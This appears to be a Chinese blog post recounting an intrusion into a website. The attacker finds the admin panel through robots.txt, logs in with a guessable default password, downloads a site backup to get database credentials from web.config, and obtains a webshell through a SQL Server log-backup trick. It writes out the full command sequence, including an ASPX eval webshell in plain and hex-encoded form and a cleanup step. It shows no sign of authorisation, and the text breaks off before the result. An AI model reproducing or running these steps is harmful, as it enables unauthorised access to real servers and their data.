记一次无聊的渗透

admin

习惯性的打开/admin /manage /manager /system 都是404，然后又打开了robots.txt，很多站长会把后台写在这边防止蜘蛛访问。
果然爆出了后台，看起来可以禁用JS来操作一些功能，不过用处不大。


在网站右下方看见了yestem的字样，果断利用弱口令admin yestem登陆。

后台翻了好久，没找到什么可以利用的东西，上传也是编辑器的。 尝试burp改包。

这边已经曝露上传路径了，将文件名改成.asp .aspx .php格式都提示检测到您的请求有潜在错误或威胁，此次操作被忽略；若影响您的访问，请联系管理员。


不过改成cer却可以上传，访问提示404(最后证实不支持asp格式)，好吧这个上传不能利用了。
继续翻后台，发现数据库备份与网站打包，前者不能利用，后者打包完后下载，文件大小2GB。。


等待下载的时间，出去吃个早饭吧。 大约1小时候回来，发现下载完成了。 果断打开web.config找数据库账号密码，并使用sqlTOOLS连接。


账号不是sa，权限只是dbowner。


没权限执行xp_cmdshell。 果断进行备份getshell。

相关命令如下:

第一步:alter database aicom set RECOVERY FULL--(数据库故障还原类型设为完全，这个地方一般都是设置为简单的)
第二步:create table cmd (a image)--(建表)
第三步:insert into cmd (a) values ('<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>')--
(中间建议hex编码处理下，不然很容易出错，修改后的命令为:insert into cmd (a) values ('0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B2278225D2C22756E7361666522293B253E')--)
第四步:backup log aicom to disk = 'D:\web\kd\Hzllaga.aspx'--(网站路径在后台可以找到 )
最后一步:drop table cmd;--(这一步很重要，别忘记了)

OK,备份完成

下面我们看看效果